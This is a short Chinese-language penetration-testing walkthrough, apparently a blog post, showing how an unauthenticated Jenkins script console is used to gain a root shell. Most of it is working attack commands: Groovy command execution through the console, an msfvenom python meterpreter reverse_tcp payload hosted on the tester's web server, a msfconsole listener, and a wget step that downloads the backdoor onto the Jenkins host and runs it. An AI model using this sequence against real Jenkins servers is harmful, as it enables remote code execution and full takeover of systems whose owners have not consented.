Jenkins未授权-反弹shell

Jenkins未授权-反弹shell

最近对公司测试网进行渗透,发现了个未授权的Jenkins。

  1. 发现未授权的Jenkins

image

  1. 转到脚本执行处:http://192.168.1.226:9090/script
1
println "ifconfig".execute().text

image

  1. 生成反弹shell的脚本
1
msfvenom -p python/meterpreter/reverse_tcp LHOST=172.16.16.126 LPORT=9901 -f raw >/var/www/html/jdk.py

image

  1. 开启apache

image

  1. Kali中使用msfconsole开启反弹shell监听
1
2
3
4
5
6
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 172.16.16.126
msf6 exploit(multi/handler) > set lport 9901
msf6 exploit(multi/handler) > set payload python/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

image

  1. 接着命令执行通过wget将后门文件jdk.py下载到本机Jenkins目录下,Result没有报错证明执行成功
1
println "wget http://172.16.16.126/jdk.py -P /".execute().text

image

  1. 执行后门文件
1
println "python jdk.py".execute().text

image

  1. 成功监听上线拿到root权限。

image